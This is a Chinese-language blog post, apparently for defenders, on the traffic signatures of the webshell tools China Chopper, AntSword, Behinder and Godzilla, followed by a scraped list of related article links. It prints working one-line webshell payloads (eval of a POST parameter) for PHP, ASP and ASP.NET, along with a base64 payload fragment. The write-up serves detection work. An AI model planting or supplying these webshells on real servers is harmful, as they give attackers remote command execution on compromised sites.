0x00 前言

使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值

0x01 中国菜刀流量分析

payload特征:
PHP: <?php @eval($_POST['caidao']);?>

ASP: <%eval request(“caidao”)%>

ASP.NET: <%@ Page
Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

数据包流量特征:
1,请求包中:ua头为百度,火狐
2,请求体中存在eavl,base64等特征字符
3,请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

0x02 蚂蚁宝剑流量分析

payload特征:
Php中使用assert,eval执行,
asp 使用eval
在jsp使用的是Java类加载(ClassLoader),同时会带有base64编码解码等字符特征

数据包流量特征:
使用普通的一句话都存在以下特征:
每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且后面存在base64等字符
响应包的结果返回格式为:
随机数
响应内容
随机数

使用base64加密的payload,数据包存在以下base加密的eval命令执行,数据包的payload内容存在几个分段内容,分别都使用base加密,解密后可以看到相关的路径,命令等
响应包的结果返回格式为:
随机数
编码后的结果
随机数

0x03 冰蝎流量分析

paylaod分析:
php在代码中同样会存在eval或assert等字符特征

在aps中会在for循环进行一段异或处理

在jsp中则利用java的反射,所以会存在ClassLoader,getClass().getClassLoader()等字符特征

冰蝎2.0流量特征:
第一阶段请求中返回包状态码为200,返回内容必定是16位的密钥
请求包存在:Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

建立连接后的cookie存在特征字符
所有请求 Cookie的格式都为: Cookie: PHPSESSID=; path=/;

冰蝎3.0流量特征:
请求包中content-length 为5740或5720(可能会根据Java版本而改变)
每一个请求头中存在
Pragma: no-cache,Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,
/*;q=0.8,application/signed-exchange;v=b3;q=0.9

0x04 哥斯拉流量特征

payload特征:
jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征
php,asp则为普通的一句话木马

哥斯拉流量分析:
作为参考:
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
同时在所有请求中Cookie中后面都存在;特征

参考:https://www.freebuf.com/articles/web/324622.html

Webshell工具的流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)相关推荐

  1. webshell管理之中国菜刀 蚁剑 WeBaCoo Weevely

    一:中国菜刀 中国菜刀是一款国产的网站管理软件,直接php,asp,aspx等脚本语言,简单来说通过菜刀连接上传到网站的一句话木马,可以控制 部分甚至全部权限,现在很多菜刀都有后门,小心使用. 一般情 ...

  2. DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)

    DVWA文件上传 前言 一.low级别 1.1 一句话木马 1.2 中国菜刀使用 1.3 蚁剑 二.Medium级别 三.High级别 四.Impossible级别 前言 文件上传漏洞是对于上传文件的 ...

  3. 【每天学习一点新知识】菜刀、冰蝎、蚁剑、哥斯拉webshell工具分析

    什么是webshell已经在之前的文章里做过讲解了,这里就不再赘述 附上链接:[每天学一点新知识]getshell???webshell???_RexHarrr的博客-CSDN博客 目录 中国菜刀 菜 ...

  4. 菜刀,蚁剑,冰蝎,哥斯拉的流量特征

    蚁剑: ini_set ini_set_time ini_set_limit @ini_set("display_errors","0") 部分代码明文传输,较 ...

  5. 渗透测试-流量加密之冰蝎蚁剑

    文章目录 前言 冰蝎 PHP冰蝎马 通信数据包 冰蝎初体验 冰蝎攻与防 蚁剑 蚁剑的安装 蚁剑初体验 蚁剑编码器 蚁剑攻与防 总结 前言 一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一 ...

  6. 冰蝎shell_冰蝎动态二进制加密WebShell特征分析

    概述 冰蝎一款新型加密网站管理客户端,在实际的渗透测试过程中有非常不错的效果,能绕过目前市场上的大部分WAF.探针设备.本文将通过在虚拟环境中使用冰蝎,通过wireshark抓取冰蝎通信流量,结合平时 ...

  7. 蚁剑软件的配置与应用

    蚁剑软件的配置与应用 蚁剑(antSword)是一款开源的网站管理软件,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,由于蚁剑(antSword)所有脚本的源代码均来自中国菜刀, ...

  8. 我不允许还有人没下载使用中国蚁剑,修改蚁剑特征冲它

    目录 一.中国蚁剑下载 二.中国蚁剑安装 第一步:解压后,打开加载器antsword-Loder文件,并运行AntSword.exe程序 第二步:再次打开AntSword.exe,就能再次运行了 三. ...

  9. 冰蝎shell_冰蝎全系列有效:针对 HTTPS 加密流量的 webshell 检测研究

    阅读: 322 webshell 是 Web 攻击中常见的一种木马形式,目前主流的检测方法都是基于 HTTP 请求和响应流量的内容特征,然而在 HTTPS 协议下,很多 webshell 检测机制是无 ...

最新文章

  1. 使用insert向表中添加数据MySQL_使用INSERT语句向表中插入数据(MSSQLSERVER版)
  2. Java中的面向对象
  3. 双栈排序java_双栈排序(Java)
  4. python xposed_Xposed及类Xposed框架收集
  5. 以下题目需要当场编写实现,,答案自己写
  6. Linux下删除mysql实例,linux下完全删除mysql
  7. matplotlibpycharm
  8. Spring4.x()---JdbcDaoSupport的使用
  9. 视图单行子查询返回mysql,Oracle命令整理 - osc_sj1kgo4z的个人空间 - OSCHINA - 中文开源技术交流社区...
  10. 学python之路前的一些话
  11. iOS 10 的一个重要更新-线程竞态检测工具 Thread Sanitizer
  12. R语言epiDisplay包的codebook函数计算dataframe中所有变量的基础描述统计信息和一维列联表(频数表)、连续变量(样本数、均值、中位数、标准差、最大值、最小值)、离散变量(列联表)
  13. java操作excel表格(最简单的教程!一学即会)
  14. 20145322 何志威《网络对抗》shellcode注入Return-to-libc攻击深入
  15. win2008Server 部署网站
  16. 使用Fiona创建Shapefile矢量数据
  17. 魔众微信管理系统,简单易用的微信公众号管理系统
  18. 快排两种实现及五种优化
  19. 浅析云计算的七种应用类型
  20. Winmail安装及服务启动失败问题

热门文章

  1. python学习的最终篇(自己的一些感悟)
  2. 【C语言】STM32控制步进电机——一种S形加减速曲线的推导与实现
  3. 最早截止时间优先即EDF算法
  4. 两大开源平台、九个基金会项目,走进百度开源的2020
  5. [Bootstrap案例练习]——现代浏览器博物馆
  6. 手机来电秀怎么开启_360手机卫士怎么设置来电秀
  7. EXCEL中设置固定行列
  8. SDN在云数据中心的应用——架构篇
  9. 第十四周学习周报(20180604-20180610)
  10. [WINDOWS]蓝屏0x00000050错误分析(转)